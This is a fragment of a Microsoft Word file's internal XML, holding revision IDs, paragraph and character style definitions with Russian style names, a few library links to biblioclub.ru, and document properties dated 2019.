    <w:rsid w:val="00C34CE3"/>
    <w:rsid w:val="00C35505"/>
    <w:rsid w:val="00C51F69"/>
    <w:rsid w:val="00C543B8"/>
    <w:rsid w:val="00C723C9"/>
    <w:rsid w:val="00C74C54"/>
    <w:rsid w:val="00C754E3"/>
    <w:rsid w:val="00C770FF"/>
    <w:rsid w:val="00C802D9"/>
    <w:rsid w:val="00C802FD"/>
    <w:rsid w:val="00C82DAF"/>
    <w:rsid w:val="00C86544"/>
    <w:rsid w:val="00C86FA8"/>
    <w:rsid w:val="00C9038D"/>
    <w:rsid w:val="00C9130C"/>
    <w:rsid w:val="00C97767"/>
    <w:rsid w:val="00CA065D"/>
    <w:rsid w:val="00CA6914"/>
    <w:rsid w:val="00CB45BC"/>
    <w:rsid w:val="00CB53D1"/>
    <w:rsid w:val="00CC15D0"/>
    <w:rsid w:val="00CC2458"/>
    <w:rsid w:val="00CC2DCA"/>
    <w:rsid w:val="00CC490E"/>
    <w:rsid w:val="00CC6D75"/>
    <w:rsid w:val="00CD1BAD"/>
    <w:rsid w:val="00CE1E63"/>
    <w:rsid w:val="00CE42E8"/>
    <w:rsid w:val="00CF06CC"/>
    <w:rsid w:val="00CF09AF"/>
    <w:rsid w:val="00CF5871"/>
    <w:rsid w:val="00D0096B"/>
    <w:rsid w:val="00D0228A"/>
    <w:rsid w:val="00D12E63"/>
    <w:rsid w:val="00D16F98"/>
    <w:rsid w:val="00D1757A"/>
    <w:rsid w:val="00D20A69"/>
    <w:rsid w:val="00D2314C"/>
    <w:rsid w:val="00D23309"/>
    <w:rsid w:val="00D2454F"/>
    <w:rsid w:val="00D258BF"/>
    <w:rsid w:val="00D32CB1"/>
    <w:rsid w:val="00D35CB6"/>
    <w:rsid w:val="00D37924"/>
    <w:rsid w:val="00D418E9"/>
    <w:rsid w:val="00D43841"/>
    <w:rsid w:val="00D453F9"/>
    <w:rsid w:val="00D455ED"/>
    <w:rsid w:val="00D475EA"/>
    <w:rsid w:val="00D47948"/>
    <w:rsid w:val="00D574B8"/>
    <w:rsid w:val="00D72363"/>
    <w:rsid w:val="00D72848"/>
    <w:rsid w:val="00D73FB0"/>
    <w:rsid w:val="00D77C1F"/>
    <w:rsid w:val="00D77CDA"/>
    <w:rsid w:val="00DA2E89"/>
    <w:rsid w:val="00DA41B6"/>
    <w:rsid w:val="00DA7DAD"/>
    <w:rsid w:val="00DB233C"/>
    <w:rsid w:val="00DB5845"/>
    <w:rsid w:val="00DB646C"/>
    <w:rsid w:val="00DC04C1"/>
    <w:rsid w:val="00DC1A7C"/>
    <w:rsid w:val="00DC5133"/>
    <w:rsid w:val="00DC7ABD"/>
    <w:rsid w:val="00DC7C85"/>
    <w:rsid w:val="00DD225C"/>
    <w:rsid w:val="00DD4B7F"/>
    <w:rsid w:val="00DD5091"/>
    <w:rsid w:val="00DD6EA2"/>
    <w:rsid w:val="00DE0AB2"/>
    <w:rsid w:val="00DE3B96"/>
    <w:rsid w:val="00DE5BE8"/>
    <w:rsid w:val="00DE662B"/>
    <w:rsid w:val="00DF7DEC"/>
    <w:rsid w:val="00E02CCB"/>
    <w:rsid w:val="00E11940"/>
    <w:rsid w:val="00E11A84"/>
    <w:rsid w:val="00E12687"/>
    <w:rsid w:val="00E22934"/>
    <w:rsid w:val="00E24B59"/>
    <w:rsid w:val="00E3087F"/>
    <w:rsid w:val="00E40F1C"/>
    <w:rsid w:val="00E41BC0"/>
    <w:rsid w:val="00E502C1"/>
    <w:rsid w:val="00E5238A"/>
    <w:rsid w:val="00E60651"/>
    <w:rsid w:val="00E6157E"/>
    <w:rsid w:val="00E62A95"/>
    <w:rsid w:val="00E7170A"/>
    <w:rsid w:val="00E71F6E"/>
    <w:rsid w:val="00E7227C"/>
    <w:rsid w:val="00E747F3"/>
    <w:rsid w:val="00E82B6E"/>
    <w:rsid w:val="00E8301B"/>
    <w:rsid w:val="00E852C3"/>
    <w:rsid w:val="00E90BE1"/>
    <w:rsid w:val="00E94CFC"/>
    <w:rsid w:val="00E9612B"/>
    <w:rsid w:val="00EA2785"/>
    <w:rsid w:val="00EA49A5"/>
    <w:rsid w:val="00EA7D67"/>
    <w:rsid w:val="00EB4CC5"/>
    <w:rsid w:val="00EB7617"/>
    <w:rsid w:val="00EC1048"/>
    <w:rsid w:val="00EC386F"/>
    <w:rsid w:val="00EC6D24"/>
    <w:rsid w:val="00ED6F1F"/>
    <w:rsid w:val="00EE4BBB"/>
    <w:rsid w:val="00EE55CD"/>
    <w:rsid w:val="00EF4816"/>
    <w:rsid w:val="00EF731A"/>
    <w:rsid w:val="00EF7464"/>
    <w:rsid w:val="00F010E1"/>
    <w:rsid w:val="00F02388"/>
    <w:rsid w:val="00F05022"/>
    <w:rsid w:val="00F12F0C"/>
    <w:rsid w:val="00F13133"/>
    <w:rsid w:val="00F14F90"/>
    <w:rsid w:val="00F16349"/>
    <w:rsid w:val="00F26E9D"/>
    <w:rsid w:val="00F26EA8"/>
    <w:rsid w:val="00F30CB7"/>
    <w:rsid w:val="00F32574"/>
    <w:rsid w:val="00F34FD3"/>
    <w:rsid w:val="00F3776D"/>
    <w:rsid w:val="00F4196A"/>
    <w:rsid w:val="00F42765"/>
    <w:rsid w:val="00F45CF5"/>
    <w:rsid w:val="00F65B34"/>
    <w:rsid w:val="00F66309"/>
    <w:rsid w:val="00F718FB"/>
    <w:rsid w:val="00F74945"/>
    <w:rsid w:val="00F8210B"/>
    <w:rsid w:val="00F83E3F"/>
    <w:rsid w:val="00F944A7"/>
    <w:rsid w:val="00F97199"/>
    <w:rsid w:val="00FA246B"/>
    <w:rsid w:val="00FA33BE"/>
    <w:rsid w:val="00FA4625"/>
    <w:rsid w:val="00FB5EFE"/>
    <w:rsid w:val="00FB6110"/>
    <w:rsid w:val="00FC199E"/>
    <w:rsid w:val="00FC4291"/>
    <w:rsid w:val="00FC4B22"/>
    <w:rsid w:val="00FC6E2E"/>
    <w:rsid w:val="00FE5B94"/>
    <w:rsid w:val="00FE5EB5"/>
    <w:rsid w:val="00FF2627"/>
    <w:rsid w:val="00FF55BA"/>
    <w:rsid w:val="00FF58FF"/>
    <w:rsid w:val="00FF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DA73C1-9D4A-4814-A772-11D95B4D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C25125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2"/>
    <w:next w:val="a2"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00515399"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:jc w:val="center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6F3D4C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="4"/>
      </w:numPr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285914"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:jc w:val="center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E1717"/>
    <w:pPr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E1717"/>
    <w:pPr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E1717"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="4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E1717"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="4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E1717"/>
    <w:pPr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E1717"/>
    <w:pPr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"/>
    <w:rsid w:val="008B4299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28591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285914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3"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003E1717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6">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="003E171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7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00BC6A0D"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003E1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3E1717"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Calibri" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E17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3"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Calibri" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="006F3D4C"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:iCs/>
      <w:spacing w:val="10"/>
      <w:sz w:val="28"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="10"/>
    <w:next w:val="a2"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002812CE"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F8210B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
      </w:tabs>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002812CE"/>
    <w:pPr>
      <w:ind w:left="221" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00AD0FC1"/>
    <w:pPr>
      <w:ind w:left="442" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="header"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E171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3"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E1717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3E1717"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="Заголовок 5 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003E1717"/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character" w:customStyle="1" w:styleId="60">
    <w:name w:val="Заголовок 6 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003E1717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character" w:customStyle="1" w:styleId="70">
    <w:name w:val="Заголовок 7 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="Заголовок 8 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003E1717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3E171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1">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00914D9E"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:spacing w:val="5"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af2">
    <w:name w:val="Название Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00914D9E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:spacing w:val="5"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="003E171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4">
    <w:name w:val="Подзаголовок Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="003E171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5">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af6">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="003E1717"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:link w:val="23"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003E1717"/>
    <w:pPr>
      <w:spacing w:before="200"/>
      <w:ind w:left="360" w:right="360"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="Цитата 2 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="22"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af7">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:link w:val="af8"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="003E1717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f8">
    <w:name w:val="Выделенная цитата Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af9">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="19"/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afa">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afb">
    <w:name w:val="Subtle Reference"/>
    <w:uiPriority w:val="31"/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:smallCaps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afc">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afd">
    <w:name w:val="Book Title"/>
    <w:uiPriority w:val="33"/>
    <w:rsid w:val="003E1717"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="004F32A5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-headline">
    <w:name w:val="mw-headline"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00B56C75"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection">
    <w:name w:val="mw-editsection"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00572BCF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection-bracket">
    <w:name w:val="mw-editsection-bracket"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00572BCF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection-divider">
    <w:name w:val="mw-editsection-divider"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00572BCF"/>
  </w:style>
  <w:style w:type="table" w:styleId="afe">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00610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q">
    <w:name w:val="q"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00FC4B22"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="a0">
    <w:name w:val="Мой список"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00186114"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="1">
    <w:name w:val="Стиль1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00103E73"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="a">
    <w:name w:val="Мой стиль списка"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BB6949"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="13">
    <w:name w:val="Сетка таблицы1"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="afe"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="004D7B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4"/>
    <w:next w:val="afe"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="004D7B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Листинг"/>
    <w:basedOn w:val="a2"/>
    <w:qFormat/>
    <w:rsid w:val="00362515"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="15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tabs>
        <w:tab w:val="left" w:pos="964"/>
        <w:tab w:val="left" w:pos="1247"/>
        <w:tab w:val="left" w:pos="1531"/>
        <w:tab w:val="left" w:pos="1814"/>
        <w:tab w:val="left" w:pos="2098"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Calibri" w:hAnsi="Consolas" w:cs="Times New Roman"/>
      <w:noProof/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:srgbClr w14:val="000000">
            <w14:lumMod w14:val="75000"/>
            <w14:lumOff w14:val="0"/>
          </w14:srgbClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta-keyword">
    <w:name w:val="hljs-meta-keyword"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00463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vk.com/away.php?to=http%3A%2F%2Fbiblioclub.ru%2Findex.php%3Fpage%3Dbook%26id%3D142238&amp;cc_key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vk.com/away.php?to=http%3A%2F%2Fbiblioclub.ru%2Findex.php%3Fpage%3Dbook%26id%3D90663&amp;cc_key=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iblioclub.ru/index.php?page=book_red&amp;id=233210&amp;sr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1FD5A-9428-4707-B7BE-5B24FEF8D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14496</TotalTime>
  <Pages>32</Pages>
  <Words>6440</Words>
  <Characters>36710</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>305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DAD</cp:lastModifiedBy>
  <cp:revision>84</cp:revision>
  <cp:lastPrinted>2016-10-31T20:11:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-05T03:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-29T08:47:00Z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